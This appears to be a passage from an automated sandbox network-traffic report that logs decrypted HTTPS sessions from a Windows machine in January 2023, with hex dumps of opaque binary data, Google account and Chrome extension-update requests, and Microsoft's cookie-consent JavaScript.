                                                                                                                                                                                    2023-01-05 07:58:38 UTC14623INData Raw: 0e f8 b6 cd 66 f8 9b 6a f7 f9 9d 45 fb 12 28 c0 ad dd 3f 81 dc 04 75 00 77 4c 6b a3 a4 8b 46 25 62 45 4a fe 81 40 e0 f6 88 48 b0 ed 71 00 77 00 2c ff b1 8b 6e 25 62 45 7f b7 b1 33 ac f5 f6 f3 62 07 9f 1d 32 0f d3 da 37 86 e9 41 6d cb 8f cb 24 63 af d1 b4 81 f2 82 68 ff 77 44 76 db 3f 0b e9 57 23 f6 ab f5 29 bb ac 31 f1 3d 00 1c 51 5f 3e 0f de fb 21 49 b3 ea 66 00 70 00 29 89 69 48 f6 ed 35 00 75 00 36 0f de fb 54 45 3d c0 b9 44 fb 5c 4d 00 37 33 a8 f5 70 81 b6 36 74 37 04 41 b3 cb 30 e9 3f 5e 82 ff 81 ff 66 ed 88 0f b4 5a 1f f0 88 48 ef 44 57 00 54 41 59 c9 38 81 84 20 73 00 77 ff e1 48 fe 64 52 f0 2c 8b 1e 25 ca 66 a3 ee e9 41 67 c9 3b 89 33 25 31 4c 7a b7 aa 4c ef cd 33 d2 f2 41 3a e9 ea 20 90 ff 32 84 a3 41 c6 d9 f4 ff ff 49 7c 3d 33 0f fb 40 94 c7 1e
                                                                                                                                                                                    Data Ascii: fjE(?uwLkF%bEJ@Hqw,n%bE3b27Am$chwDv?W#)1=Q_>!Ifp)iH5u6TE=D\M73p6t7A0?^fZHDWTAY8 swHdR,%fAg;3%1LzL3A: 2AI|=3@
                                                                                                                                                                                    2023-01-05 07:58:38 UTC14639INData Raw: a2 e9 00 ec cf ff 8a c9 82 f7 b5 d1 b3 41 61 31 6e 24 35 0f a8 db 36 86 ac 41 f1 eb 5f 41 2c 48 07 c9 37 3a e2 48 61 f9 99 5f e6 f2 8c 81 b5 63 56 12 12 57 46 14 40 66 7d bb fd 40 b0 f7 31 f6 af 3f 2c 41 81 c6 db 48 16 d2 3b 03 a6 e9 81 0b c4 ff 9c c8 30 32 90 41 f3 fd 38 89 05 04 35 80 a1 c5 24 f6 ac 66 3d be 91 48 f1 ed 6c 00 73 00 37 b6 a9 66 a6 fe 11 d3 82 8b 06 25 32 e9 ec ef 86 ff 2c 33 ac e9 83 d0 c2 ff 8a cb 80 db 9c 57 43 1c 16 40 6d 92 b7 66 67 ba 8c 70 37 d2 ce 5f 82 c4 c4 3f df 66 8b 48 51 db 2e 03 b3 e9 61 51 81 ff 36 f6 e1 e9 84 46 99 ff 02 41 f5 d8 73 58 04 98 7f b7 b1 66 33 0f c1 df 6e f6 a2 58 11 0f af 5b 9b b1 77 fd 9d ff 97 48 0b d2 3b 03 85 e9 7c 57 80 ff 9e 1b 9e ed 8d 80 cc 3d 51 c7 89 f5 a9 c8 70 e9 da 62 c5 ff f4 fb 73 00 64 00 7d
                                                                                                                                                                                    Data Ascii: Aa1n$56A_A,H7:Ha_cVWF@f}@1?,AH;02A85$f=Hls7f%2,3WC@mfgp7_?fHQ.aQ6FAsXf3nX[wH;|W=Qpbsd}
                                                                                                                                                                                    2023-01-05 07:58:38 UTC14655INData Raw: a8 40 f0 d6 90 0f c9 e6 00 66 70 0f c8 f0 80 da 02 40 7d b6 c4 ff a8 81 86 53 0d 09 20 48 78 ba c7 41 f4 f2 80 23 41 07 14 2b c7 48 6d a3 86 55 0e 0f c8 fd 37 32 c4 31 61 24 11 be 6a 51 2f 40 b2 d6 bf 49 f1 e9 6c 00 73 00 11 44 3e ac 83 dd 3f 0f de f6 9e 41 bb 11 04 0f cc f2 21 23 83 f9 3e 81 db 04 75 00 77 66 25 8b 85 41 b9 32 8b 09 e4 ef 97 ff bd d1 b1 e9 b6 7a 8f ff 41 88 6a 48 7d bd e3 45 e6 d2 38 81 85 04 73 00 77 8b 65 25 75 f9 44 d7 8d e4 99 f8 cd ff b2 48 fb 64 4d f0 8a 66 33 0f 95 e3 41 48 fc 6c 41 f8 33 c0 f8 6c 6d c1 8f 40 a8 f7 ce 48 fe 44 14 00 13 d3 98 d3 9f 4c f9 cd 72 80 87 08 2d 41 e2 fa 8d c3 2c 44 b5 c0 35 8a 8c 0f d8 fa 33 5a 54 0f d8 ff 38 40 ba f7 3a 81 9d 04 31 00 75 41 fc 3a 57 fd 8a 81 dd cc 6d 9f 54 f7 b7 e9 61 48 85 ff 79 03 ab
                                                                                                                                                                                    Data Ascii: @fp@}S HxA#A+HmU721a$jQ/@IlsD>?A!#>uwf%A2zAjH}E8swe%uDHdMf3AHlA3lm@HDLr-A,D53ZT8@:1uA:WmTaHy
                                                                                                                                                                                    2023-01-05 07:58:38 UTC14671INData Raw: b3 f9 a6 c0 c9 f9 22 31 73 24 02 41 49 d8 cd c7 22 0f ec c7 37 48 10 c0 36 80 cc 50 8c f5 3b 03 a4 e9 ce 99 ce ff 22 8a a4 66 67 b6 a6 9c 11 41 0a c3 3d 63 a6 41 eb 03 33 80 cc 91 2b 81 9a 04 68 00 73 c0 9d 39 79 f7 a7 41 78 b7 b2 41 f9 12 54 41 e7 ec 99 e2 58 f6 8c ff bf f5 66 d3 a2 31 73 24 02 d3 ad 66 76 0f d1 ef 16 0f d2 e7 a8 5f 8e 48 52 c0 13 41 4c eb 9d 4c 71 c0 db f9 a2 f0 8f 4d 0b c0 3a 03 87 e9 ca 2f 8d ff 88 ce b5 ce f3 ee f5 7a ca 1d 88 40 52 e8 84 d6 8f f9 d8 e5 8a ed 88 d1 a2 40 48 e8 72 f6 a6 cd f1 f6 a6 3e 13 6c 82 f8 64 66 f4 ff e3 43 55 34 56 66 39 ea 22 80 a5 c7 29 2a 9d 5d 9e 51 c7 ed 8a 49 80 c2 10 3b 2b 75 54 41 e7 f9 31 53 25 0f cc db 36 80 c2 a3 44 2c 53 41 e4 c3 f2 49 e1 d3 04 41 87 d3 29 5b 3b 63 9a 48 32 fd 9c 4e 29 f9 9b f5 21
                                                                                                                                                                                    Data Ascii: "1s$AI"7H6P;"fgA=cA3+hs9yAxATAXf1s$fv_HRALLqM:/z@R@Hr>ldfCU4Vf9")*]QI;+uTA1S%6D,SAIA)[;cH2N)!
                                                                                                                                                                                    2023-01-05 07:58:38 UTC14687INData Raw: 52 b2 61 00 b8 fb 76 00 e7 0d 37 00 e5 c0 66 00 f4 0d 74 00 79 1a 64 00 d8 c0 79 00 3f 1a 71 00 0d 1c 73 00 b7 c0 75 00 4e 1c 34 00 a9 1d 76 00 14 bb 62 00 bb 1d 37 00 df 1e 71 00 60 72 63 00 9e 1e 64 00 a6 26 6e 00 ab c0 66 00 e9 26 73 00 a6 29 62 00 86 c0 23 00 b6 29 76 00 ca 2a 75 00 9f 71 20 00 d1 2a 71 00 99 2a 74 00 32 67 73 00 70 2b 6e 00 a3 2b 71 00 3d c1 64 00 a7 2b 62 00 58 2c 34 00 7e 72 61 00 2c 2c 75 00 18 62 37 00 55 c1 66 00 14 62 74 00 30 63 64 00 f4 71 79 00 77 63 71 00 43 64 73 00 7b ae 75 00 06 64 34 00 b6 67 76 00 54 c1 62 00 a3 67 37 00 cb 68 71 00 60 72 63 00 f2 68 64 00 9f 68 6e 00 73 67 66 00 19 69 73 00 11 69 62 00 26 a9 23 00 0a 69 76 00 af 6d 75 00 23 c1 20 00 bd 6d 71 00 b5 6e 74 00 de b5 73 00 a4 6e 6e 00 7e 71 71 00 5d c1 64
                                                                                                                                                                                    Data Ascii: Rav7ftydy?qsuN4vb7q`rcd&nf&s)b#)v*uq *q*t2gsp+n+q=d+bX,4~ra,,ub7Ufbt0cdqywcqCds{ud4gvTbg7hq`rchdhnsgfisib&#ivmu# mqntsnn~qq]d
                                                                                                                                                                                    2023-01-05 07:58:38 UTC14703INData Raw: 08 7d 7f 00 f0 81 6f 00 cc 1f 7a 00 b7 81 7a 00 82 82 78 00 9b 1f 76 00 c6 82 3f 00 2f 83 7d 00 74 72 62 00 17 83 3c 00 ac 84 7a 00 58 20 60 00 ee 84 6f 00 d4 86 65 00 6f 20 65 00 95 86 78 00 46 88 69 00 16 20 20 00 56 88 7d 00 21 8b 7e 00 eb 20 23 00 39 8b 7a 00 86 8b 7f 00 be 20 70 00 94 8b 65 00 3a 8c 7a 00 31 67 64 00 3b 8c 69 00 7f 8f 3f 00 7e 72 61 00 78 8f 7e 00 db 8f 3c 00 b1 20 65 00 c8 8f 7f 00 e1 8f 6f 00 64 67 79 00 a7 8f 7a 00 d0 92 78 00 af 20 76 00 96 92 3f 00 6c 93 7d 00 7c 67 62 00 67 93 3c 00 4b 93 7a 00 78 67 63 00 72 93 6f 00 2d 93 65 00 73 67 66 00 51 93 78 00 ab 93 69 00 9e 20 20 00 be 93 7d 00 93 93 7e 00 77 67 20 00 89 93 7a 00 69 94 7f 00 2e 67 73 00 60 94 65 00 f3 94 7a 00 25 21 67 00 f7 94 69 00 d6 95 3f 00 4e 21 62 00 cc 95 7e
                                                                                                                                                                                    Data Ascii: }ozzxv?/}trb<zX `oeo exFi V}!~ #9z pe:z1gd;i?~rax~< eodgyzx v?l}|gbg<Kzxgcro-esgfQxi }~wg zi.gs`ez%!gi?N!b~


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    43192.168.2.449788142.251.209.13443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:51 UTC14717OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                                                    Host: accounts.google.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 1
                                                                                                                                                                                    Origin: https://www.google.com
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
                                                                                                                                                                                    2023-01-05 07:58:51 UTC14717OUTData Raw: 20
                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    44192.168.2.449786142.250.184.78443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:51 UTC14717OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                                                    Host: clients2.google.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    X-Goog-Update-Interactivity: fg
                                                                                                                                                                                    X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                                                                                                                    X-Goog-Update-Updater: chromecrx-104.0.5112.81
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    45142.250.184.78443192.168.2.449786C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:51 UTC14718INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-BS4ejtcAq2GSs4RI3P9qZQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:58:51 GMT
                                                                                                                                                                                    Content-Type: text/xml; charset=UTF-8
                                                                                                                                                                                    X-Daynum: 5847
                                                                                                                                                                                    X-Daystart: 86331
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Server: GSE
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    2023-01-05 07:58:51 UTC14719INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 38 34 37 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 38 36 33 33 31 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                                                    Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5847" elapsed_seconds="86331"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                                                    2023-01-05 07:58:51 UTC14719INData Raw: 6d 78 76 59 6e 4d 76 4e 7a 49 30 51 55 46 58 4e 56 39 7a 54 32 52 76 64 55 77 79 4d 45 52 45 53 45 5a 47 56 6d 4a 6e 51 51 2f 31 2e 30 2e 30 2e 36 5f 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69
                                                                                                                                                                                    Data Ascii: mxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" si
                                                                                                                                                                                    2023-01-05 07:58:51 UTC14720INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    46142.251.209.13443192.168.2.449788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:51 UTC14720INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:58:51 GMT
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-x8YFT8SGtSJfO7RzMjs5bg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    2023-01-05 07:58:51 UTC14721INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                                                    Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                                                    2023-01-05 07:58:51 UTC14721INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    47192.168.2.44979913.107.237.60443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14721OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                    Host: wcpstatic.microsoft.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://learn.microsoft.com/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    4813.107.237.60443192.168.2.449799C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14722INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: max-age=43200
                                                                                                                                                                                    Content-Length: 279220
                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                    Content-MD5: X1JOIM5h9UISVFS6+GfEew==
                                                                                                                                                                                    Last-Modified: Wed, 24 Aug 2022 17:34:36 GMT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Age: 25945
                                                                                                                                                                                    ETag: 0x8DA85F6EA62BF74
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                    X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                    x-ms-request-id: ff23b5a2-e01e-000d-1c9f-20e868000000
                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                    X-Azure-Ref: 0PIO2YwAAAABau1a5vgElTbr0pSH9I3s3RlJBMzFFREdFMDkxMQAzOWI0NjE1Ny1jYjllLTQ5YjctYTY1YS04NzIyYTNmODI0ZTQ=
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:58:52 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14723INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 61 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 6e 29 7b 69 66 28 61 5b 6e 5d 29 72 65 74 75 72 6e 20 61 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 61 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 69 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 69 2e 6d 3d 65 2c 69 2e 63 3d 61 2c 69 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                    Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var a={};function i(n){if(a[n])return a[n].exports;var o=a[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,i),o.l=!0,o.exports}return i.m=e,i.c=a,i.d=function(e
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14731INData Raw: 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 38 30 25 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 31 39 70 78 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 65 67 6f 65 20 55 49 2c 20 53 65 67 6f 65 55 49 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 64 69 76 5b 64 69 72 3d 22 72 74 6c 22 5d 20 2e 5f 33 52 4a 7a 65 4c 33 6c 39 52 6c 5f 6c 41 51
                                                                                                                                                                                    Data Ascii: dding-right:0;width:80%;width:calc(100% - 19px);font-family:Segoe UI, SegoeUI, Arial, sans-serif;font-style:normal;font-weight:normal;font-size:15px;line-height:20px;text-transform:none;cursor:pointer;box-sizing:border-box}div[dir="rtl"] ._3RJzeL3l9Rl_lAQ
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14739INData Raw: 61
                                                                                                                                                                                    Data Ascii: a
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14739INData Raw: 2d 6c 61 62 65 6c 3d 22 27 2b 74 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 29 2b 27 22 20 63 6c 61 73 73 3d 22 27 2b 72 2e 63 6c 6f 73 65 4d 6f 64 61 6c 49 63 6f 6e 2b 27 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 26 23 78 32 37 31 35 3b 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 20 63 6c 61 73 73 3d 22 27 2b 72 2e 6d 6f 64 61 6c 42 6f 64 79 2b 27 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 27 2b 72 2e 6d 6f 64
                                                                                                                                                                                    Data Ascii: -label="'+t.escapeHtml(this.textResources.preferencesDialogCloseLabel)+'" class="'+r.closeModalIcon+'" tabindex="0">&#x2715;</button>\n <div role="document" class="'+r.modalBody+'">\n <div>\n <h1 class="'+r.mod
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14747INData Raw: 2b 2b 29 7d 7d 7d 2c 65 7d 28 29 2c 6c 3d 6e 2e 6c 6f 63 61 6c 73 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 72 65 74 75 72 6e 20 65 2e 63 72 65 61 74 65 54 68 65 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 69 66 28 21 61 5b 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 62 65 74 77 65 65 6e 2d 70 61 67 65 2d 61 6e 64 2d 64 69 61 6c 6f 67 22 5d 29 7b 76 61 72 20 69 3d 61 5b 22 64 69 61 6c 6f 67 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 3b 74 68 69 73 2e 73 65 74 4d 69 73 73 69 6e 67 43 6f 6c 6f 72 46 72 6f 6d 41 6e 6f 74 68 65 72 50 72 6f 70 65 72 74 79 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 62 65 74 77 65 65 6e 2d 70 61 67 65 2d 61 6e 64 2d 64 69 61 6c 6f 67 22 2c 69
                                                                                                                                                                                    Data Ascii: ++)}}},e}(),l=n.locals,c=function(){function e(){}return e.createTheme=function(e,a){if(!a["background-color-between-page-and-dialog"]){var i=a["dialog-background-color"];this.setMissingColorFromAnotherProperty("background-color-between-page-and-dialog",i
